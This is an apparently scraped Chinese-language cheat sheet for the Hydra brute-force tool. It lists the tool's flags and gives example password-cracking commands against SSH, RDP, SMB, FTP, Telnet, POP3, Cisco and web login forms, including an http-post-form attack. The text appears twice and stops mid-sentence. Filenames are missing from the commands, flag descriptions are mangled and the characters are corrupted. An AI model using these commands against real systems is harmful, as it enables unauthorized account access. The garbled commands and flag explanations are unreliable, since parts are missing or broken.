2023年7月31日发(作者:)
Hydra(暴⼒破解⼯具)参数参数详解:-R 根据上⼀次进度继续破解-S 使⽤SSL协议连接-s 指定端⼝-l 指定⽤户名-L 指定⽤户名字典(⽂件)-p 指定密码破解-P 指定密码字典(⽂件)-e 空密码探测和指定⽤户密码探测(ns)-C ⽤户名可以⽤:分割(username:password)可以代替-l username -p password-o 输出⽂件-M ⽂件-t 指定多线程数量,默认为16个线程-x 最⼩值:MAX:CHARSET +,|-C ⽂件 [,ID:密码]f =w +(等待时间)([:32])-4/6 0 +IPv4/IPv6 +(:IPv4)-vV 显⽰详细过程server ⽬标IPservice 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2…)使⽤案例:使⽤hydra破解ssh的密码hydra -L -P -vV -o -e ns IP ssh破解https:hydra -m / -l username -P IP https破解teamspeak:hydra -l ⽤户名 -P 密码字典 -s 端⼝号 -vV ip teamspeak破解cisco:hydra -P IP ciscohydra -m cloud -P 10.36.16.18 cisco-enable破解smb:hydra -l administrator -P IP smb破解pop3:hydra -l muts -P pop3破解rdp:hydra IP rdp -l administrator -P -V破解http-proxy:hydra -l admin -P http-proxy://10.36.16.18破解telnethydra IP telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f -V破解ftp:hydra IP ftp -l ⽤户名 -P 密码字典 -t 线程(默认16) -vVhydra IP ftp -l ⽤户名 -P 密码字典 -e ns -vVget⽅式提交,破解web登录: # hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/ # hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/t⽅式提交,破解web登录: 该软件的强⼤之处就在于⽀持多种协议的破解,同样也⽀持对于web⽤户界⾯的登录破解,get⽅式提交的表单⽐较简单,这⾥通过post⽅式提交密码破解提供思路。该⼯具有⼀个不好的地⽅就是,如果⽬标⽹站登录时候需要验证码就⽆法破解了。带参数破解如下: 假设有以上⼀个密码登录表单,我们执⾏命令: # hydra -l admin -P -o -t 1 -f 127.0.0.1 http-post-form“:name=^USER^&pwd=^PASS^: ” 说明:破解的⽤户名是admin,密码字典是,破解结果保存在,-t 是同时线程数为1,-f 是当破解了⼀个密码就停⽌,ip 是本地,就是⽬标ip,http-post-form表⽰破解是采⽤http 的post ⽅式提交的表单密码破解。 后⾯参数是⽹页中对应的表单字段的name 属性,后⾯
2023年7月31日发(作者:)
Hydra(暴⼒破解⼯具)参数参数详解:-R 根据上⼀次进度继续破解-S 使⽤SSL协议连接-s 指定端⼝-l 指定⽤户名-L 指定⽤户名字典(⽂件)-p 指定密码破解-P 指定密码字典(⽂件)-e 空密码探测和指定⽤户密码探测(ns)-C ⽤户名可以⽤:分割(username:password)可以代替-l username -p password-o 输出⽂件-M ⽂件-t 指定多线程数量,默认为16个线程-x 最⼩值:MAX:CHARSET +,|-C ⽂件 [,ID:密码]f =w +(等待时间)([:32])-4/6 0 +IPv4/IPv6 +(:IPv4)-vV 显⽰详细过程server ⽬标IPservice 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2…)使⽤案例:使⽤hydra破解ssh的密码hydra -L -P -vV -o -e ns IP ssh破解https:hydra -m / -l username -P IP https破解teamspeak:hydra -l ⽤户名 -P 密码字典 -s 端⼝号 -vV ip teamspeak破解cisco:hydra -P IP ciscohydra -m cloud -P 10.36.16.18 cisco-enable破解smb:hydra -l administrator -P IP smb破解pop3:hydra -l muts -P pop3破解rdp:hydra IP rdp -l administrator -P -V破解http-proxy:hydra -l admin -P http-proxy://10.36.16.18破解telnethydra IP telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f -V破解ftp:hydra IP ftp -l ⽤户名 -P 密码字典 -t 线程(默认16) -vVhydra IP ftp -l ⽤户名 -P 密码字典 -e ns -vVget⽅式提交,破解web登录: # hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/ # hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/t⽅式提交,破解web登录: 该软件的强⼤之处就在于⽀持多种协议的破解,同样也⽀持对于web⽤户界⾯的登录破解,get⽅式提交的表单⽐较简单,这⾥通过post⽅式提交密码破解提供思路。该⼯具有⼀个不好的地⽅就是,如果⽬标⽹站登录时候需要验证码就⽆法破解了。带参数破解如下: 假设有以上⼀个密码登录表单,我们执⾏命令: # hydra -l admin -P -o -t 1 -f 127.0.0.1 http-post-form“:name=^USER^&pwd=^PASS^: ” 说明:破解的⽤户名是admin,密码字典是,破解结果保存在,-t 是同时线程数为1,-f 是当破解了⼀个密码就停⽌,ip 是本地,就是⽬标ip,http-post-form表⽰破解是采⽤http 的post ⽅式提交的表单密码破解。 后⾯参数是⽹页中对应的表单字段的name 属性,后⾯
发布评论